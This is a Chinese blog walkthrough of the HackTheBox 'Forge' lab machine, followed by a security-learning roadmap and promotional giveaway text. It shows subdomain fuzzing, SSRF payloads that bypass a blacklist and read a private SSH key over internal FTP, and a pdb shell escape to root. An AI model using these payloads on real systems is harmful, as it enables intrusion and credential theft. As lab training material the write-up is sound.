CTF-Forge HackTheBox渗透测试(四)

最新推荐文章于 2023-07-31 16:44:28 发布
最新推荐文章于 2023-07-31 16:44:28 发布
阅读量299 收藏 1
点赞数
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2206/article/details/129824409
版权

0X01简介

Forge是一个CTF
Linux盒子,在HackTheBox平台的难度范围内被评为“中等”。该靶场内容涵盖了子域枚举、SSRF攻击和用于特权升级的python脚本的逆向工程。

0X02渗透路径

2.1信息收集

·Nmap

2.2目录列举

·使用wfuzz进行子域枚举

·在Web应用程序上检查文件上传过滤器

2.3漏洞利用

·利用SSRF读取私有SSH密钥

·使用此SSH密钥登录

2.4权限提升

·了解以sudo运行的python脚本

·通过利用pdb获得根

0x03 信息收集

靶场机分配专用IP地址是10.129.164.116。使用nmap端口扫描工具对靶场IP
nmap扫描。我们查看nmap扫描结果,服务器试图将请求重定向到http://forge.htb。我们将在主机文件中添加此IP并访问网络服务器。(如图3.1所示)

nmap -sV -sC -p 1-1000 10.129.164.116

v2-e2e6bef7c423ab4aa630dc54736bdcc9_1440w.png

图3.1 namp扫描端口

现在,我们访问靶场服务器,该服务器似乎正在运行一个图片画展网站。(如图3.2所示)

v2-a82d492b717c851558bc3c1499792f4a_1440w.png

​图3.2 访问网站页面

0x04 目录枚举

正如我们所看到的,图片画展中有一个上传功能。我们尝试上传PHP有效负载并获得反向shell,但没有成功。然而,文件正在上传到服务器,内容在那它没有执行代码。

然而,由于该网站正在重定向到 forge.htb,因此网站上可能还有其他子域。我们为这个暴力使用了wfuzz(以及秘密列表的单词列表)。

wfuzz -w /home/kali/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "主机:FUZZ.forge.htb" --sc 200 10.129.164.116

这表明admin.forge.htb存在。(如图4.1所示)

v2-74c9a07a72b30a2f6214967653791310_1440w.png

图4.1 子域名枚举

然而,在使用curl打开URL时,发现了一个错误。意味着服务器上有一个访问控制过滤器。(如图4.2所示)

echo "10.129.164.116 admin.forge.htb" >> /etc/hostscurl http://admin.forge.htb/

v2-a63b3b7673ea1cb5afdc2f789225ce97_1440w.png

​图4.2 访问admin页面

因此,我们查看另一个上传选项“可以上传URL网站”。只允许HTTP、HTTPS URL。(如图4.3所示)

v2-1cd69da6fadb9b07ce7d2c75fcba61e8_1440w.png

​图4.3 支持http/https协议访问

我使用netcat在端口80上设置了一个监听器,输入http://10.10.16.10/shell.php使用我的HTB隧道IP。(如图4.4所示)

1666920856_635b319863c8552049f56.png!small?1666920856990

图4.4 设置htb隧道地址

在我的netcat监听器上,我可以看到试图获取shell.php的网站。这里有一些需要注意的内容:

·服务器试图从我的IP中获取指定的文件shell.php

·请求在主机头中了我的IP

·用户代理是python-requests,这是一个python爬虫(如图4.5所示)

v2-7413cb53774af871e51045683eca765c_1440w.png

图4.5 设置监听反弹访问网站内容

0x05 漏洞利用

现在服务器已经建立,服务器试图获取远程文件,我们可以从这里开始渗透。我的第一个想法是使用此远程URL功能访问admin.forge.htb,因为该页面只允许localhost访问。通过访问我们发现了一个新问题。(如图5.1所示)

v2-ead12e29bb0c44632377f65a351b4eb3_1440w.png

图5.1访问admin子域禁止黑名单

这个地址被列入黑名单。让我们看看是否可以在所有大写字母(ADMIN.forge.htb)中键入子域“admin”来绕过这一点,这个也是渗透测试中常常绕过waf的方式,尤其是注入、xss等类型的漏洞。通过转换大小写看起来我们现在可以访问admin.forge.htb这个应用网站。这个漏洞被称为SSRF(服务器端请求伪造),攻击者能够篡改服务器上的后端请求,并突破各种访问控制(如这里的本地主机),以访问敏感文件,甚至获得远程shell。(如图5.2所示)

v2-ca7ceb297bf57321bd4340ed625b1fff_1440w.png

​图5.2 通过大小写绕过本地访问策略

这告诉我一个页面/公告,然后我试图使用http://ADMIN.forge.htb/announcements访问该页面/公告,但这也被列入黑名单。所以,我使用了这个有效载荷:

http://ADMIN.FORGE.htb/announcements curl http://forge.htb/uploads/ps14SjF8useIEk0VOao1

从这一结果中推断出的重要关键点如下:

·内部FTP服务器正在运行,其凭据为用户:heightofsecurity123!

·上传文件选项支持FTP和FTPS

·?u=可用于在/uploads页面上上传图像。(如图5.3所示)

v2-43b5673cbfdb308648b53d5a716bf697_1440w.png

图5.3 发现ftp服务器登录账号密码

因此,如果/上传方式支持通过URL和FTP协议进行包含,我们可以利用SSRF并访问内部FTP服务器!我使用的有效载荷是(如图5.4所示)

http://ADMIN.FORGE.htb/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/

v2-6527bf67b383ace22c4dd7322f2f099b_1440w.png

​图5.4 登录ftp服务器查看文件列表

现在,如果我能访问user.txt,可能也可以访问私有SSH密钥。我使用这个有效载荷做到了这一点:(如图5.5所示)

http://ADMIN.FORGE.htb/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/.ssh/id_rsa

v2-8e7e7d17f24f4aae0877bf6f3055afc0_1440w.png

​图5.5 查看ssh的id_rsa密钥

将该密钥保存在我的本地系统中,我们可以登录受害者框。(如图5.6所示)

nano id_rsa chmod 600 id_rsa ssh -i id_rsa user@forge.htb

v2-e32448faecf8fe0f492e2d2ce2ca723f_1440w.png

​图5.6 ssh登录服务器

0x06特权升级

现在我们有了一个稳定的用户shell,我们可以持续权限提升。我检查了sudoers文件,该文件有一个python脚本可以作为root运行。此脚本打开了一个监听器,供远程客户端连接。此外,它将输入密码与硬编码的凭据secretadminpassword进行比较(如图6.1所示)

sudo -l
cat /opt/remote-manage.py

v2-60ecfa9ee8ff8ba1fc8f43426c80b7a4_1440w.png

​图6.1发现配置文件账号密码

让我们这样做,然后从另一个终端再次登录此用户,并使用netcat连接到脚本。(如图6.2所示)

sudo /usr/bin/python3 /opt/remote-manage.py
nc localhost 55465

v2-1303b77f24bfad4d2f26924881f13f6d_1440w.png

​图6.2 打开另外一个终端连接服务器

现在,我正在有效地与一个root运行的python脚本进行通信。你会注意到这个脚本还有缺陷。如果我输入“秘密管理员密码”以外的任何内容,它就会抛出异常并打开Python调试器。(如图6.3所示)

v2-a954e4d2e6ee98ff0bd5f5ddd1d6335b_1440w.png

​图6.3 python导入os模块

现在,我们有一个Python调试器(pdb)作为root运行。如果这个缺陷不存在,我们会使用缓冲区溢出攻击进入调试器。无论如何,我们可以使用调试器作为root执行任何功能。我在这里使用了gtfobins使用的技术。只需使用os模块调用shell。这就是我们在这个渗透盒子的root权限。
(如图6.4所示)

import os;os.system(“/bin/sh”) id cat /root/root.txt

v2-742aa3f97e0d48e39a756793394816cc_1440w.png

图6.4 提升权限为root用户

0x07 结论

这个渗透测试靶场虚拟中,我们涵盖了子域枚举、SSRF和基本的Python逆向工程。希望你喜欢这篇文章。

本系列准备开启国内外安全靶场渗透测试系列也欢迎大家投稿包括但不限于VulnStack、Vulnhub、HTB、自行搭建系列靶场。通过靶场快速带领大家学习红队各系列知识。

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!
扫下方二维码,免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集的视频、文档资源,有需要的可以自取:
每个成长路线对应板块的配套视频:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,需要的可以【扫下方二维码免费领取】

HarkAllen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信息搜集--总结
m0_50627257的博客
09-15 135
1.更新kali > apt-get update 更新软件版本信息 > apt-get upgrade -y 升级所有软件 > apt-get dist-upgrade -y 升级整个系统 2.安装ssh > apt-get install sshd 安装 > yum install sshd > service sshd start 开启ssh服务 > vim /etc/ssh/sshd_config Sudo Systemctl enable s.
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1373
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
CTF:信息泄露.(CTFHub靶场环境)
网络安全领域___专研者.
07-31 2746
“ 信息泄露 ” 是指网站无意间向用户泄露敏感信息,泄露了有关于其他用户的数据,例如:另一个用户名的财务信息,敏感的商业 或 商业数据 ,还有一些有关网站及其基础架构的技术细节 等泄露信息。泄露敏感的用户或业务数据的危险相当明显,但是泄露技术信息有时可能同样严重,尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他的漏洞。
红队打靶:LampSecurity:CTF7打靶思路详解(vulnhub)
Bossfrank的博客
06-21 1204
本文详述了vulnhub靶场LampSecurity:CTF7的详细打靶过程。打靶过程涉及到关于SQL注入、不安全的文件上传、awk字符串处理、md5哈希批量破解,密码喷射等。
HackTheBox - Brainfuck Write Up
ak.Gh0st的博客
04-12 421
HackTheBox - Brainfuck Write Up
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
HackTheBox-CTF-Writeups:此备忘单旨在面向CTF玩家和初学者,以帮助他们根据操作系统和难度对Hack The Box Labs进行分类
05-06
HackTheBox CTF速查表 该备忘单面向CTF玩家和初学者,可帮助他们根据操作系统和难度对Hack The Box Labs进行分类。 此列表包含hackingarticles上所有可用的Hack The Box文章。 我们已经根据我们的经验执行并编制了此...
github-subdomains:在GitHub上查找子域
04-29
github子域 在GitHub上找到子域。 安装 go get -u github.com/gwen001/github-subdomains 或者 git clone https://github.com/gwen001/github-subdomains cd github-subdomains go install 用法 github-subdomains -h Usage of github-subdomains: -d string domain you are looking for (required) -e extended mode, also look for <dummy>example.com -k exit the program when all tokens have been disabled -o string out
红队打靶:LampSecurity:CTF5打靶思路详解(vulnhub)
Bossfrank的博客
06-20 824
本文是vulnhub靶机LampSecurity:CTF5的打靶思路详解,涉及的知识点包括到关于NanoCMS凭据泄露漏洞利用、历史记录凭据搜索等。靶机不难,但在寻找cms后台登录和提权的过程需要经验。
靶机渗透日记 利用SSRF
Anonymous
02-11 429
端口 这里应该没有一个处于 filter 的 ftp 端口 目录 访问 80 端口 发现存在上传功能 发现可以上传文件,但是不能解析 查找子域名 ffuf -u http://forge.htb -w subdomains-top1million-5000.txt -H "HOST:FUZZ.forge.htb" -mc 200 访问子域名,提示只能本地访问 返回上传页面,还存在一个从URL上传的选项 这里本地起一个web服务器,请求web服务器上的一个文件 发现目..
Hack The Box 系列域渗透之靶机Cascade
小王的储物间
02-03 475
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第八篇,靶机名字为Cascade。首先我们通过ldap进行信息搜集,发现了r.thompson用户的密码,通过访问r.thompson用户可以查看的SMB共享,我们获得了一封邮件以及用户s.smith用户的VNC密码(被加密了),后续我们通过Google找到了可以破解该密码的工具并成功得到。
Hack-The-Box-Three
ffff5的博客
04-17 462
Hack The Box初级靶机Three通关记录!
【Hack The Box】linux练习-- SneakyMailer
人间体佐菲的博客
11-27 361
【Hack The Box】linux练习-- SneakyMailer
CTF-Horizontall HackTheBox渗透测试(一)
Jinmindong
03-28 159
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
HackTheBox | Pandora
Purpose_7的博客
01-11 163
HackTheBox | Pandora
渗透测试CTF-流量分析
保持微笑的博客
11-03 3892
渗透测试CTF-流量分析
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值